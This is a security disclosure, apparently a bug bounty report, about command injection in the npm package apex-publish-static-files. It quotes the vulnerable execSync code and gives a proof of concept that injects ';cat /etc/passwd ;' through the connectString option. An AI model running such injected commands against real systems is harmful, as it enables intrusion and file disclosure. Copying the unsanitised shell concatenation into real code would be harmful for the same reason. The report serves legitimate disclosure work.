I would like to report a command injection vulnerability in the apex-publish-static-files npm module.
It allows arbitrary shell command execution through a maliciously crafted argument.
module name: apex-publish-static-files
version: 2.0.0
npm page: https://www.npmjs.com/package/apex-publish-static-files
>Uploads all files from a local directory to Oracle APEX
15 downloads in the last day
~170 downloads in the last month
apex-publish-static-files does not sanitize the connectString argument. It concatenates it into a command line that is passed to execSync(), which hands the string to a shell, thus allowing arbitrary shell command injection.
Vulnerable code: https://github.com/vincentmorneau/apex-publish-static-files/blob/master/index.js#54-66
```javascript
// index.js (excerpt): opts comes straight from the caller's publish() options.
const { execSync } = require('child_process');
const path = require('path');

const childProcess = execSync(
  '"' + opts.sqlclPath + '"' + // Sqlcl path
  ' ' + opts.connectString + // Connect string (user/pass@server:port/sid), unquoted and unsanitized
  ' @"' + path.resolve(__dirname, 'lib/script') + '"' + // Sql to execute
  ' "' + path.resolve(__dirname, 'lib/distUpload.js') + '"' + // Param &1 (js to execute)
  ' "' + path.resolve(opts.directory) + '"' + // Param &2
  ' ' + opts.appID + // Param &3
  ' "' + opts.destination + '"' + // Param &4
  ' "' + opts.pluginName + '"' // Param &5
  , {
    encoding: 'utf8'
  }
);
```
Proof of concept (index.js):

```javascript
var publisher = require('apex-publish-static-files');
publisher.publish({
  connectString: ";cat /etc/passwd ;",
  directory: "public",
  appID: 111
});
```

```sh
node index.js
```
Attachment: F342500

OS: WSL Ubuntu 16.04
NODE: v10.8.0
NPM: 6.2.0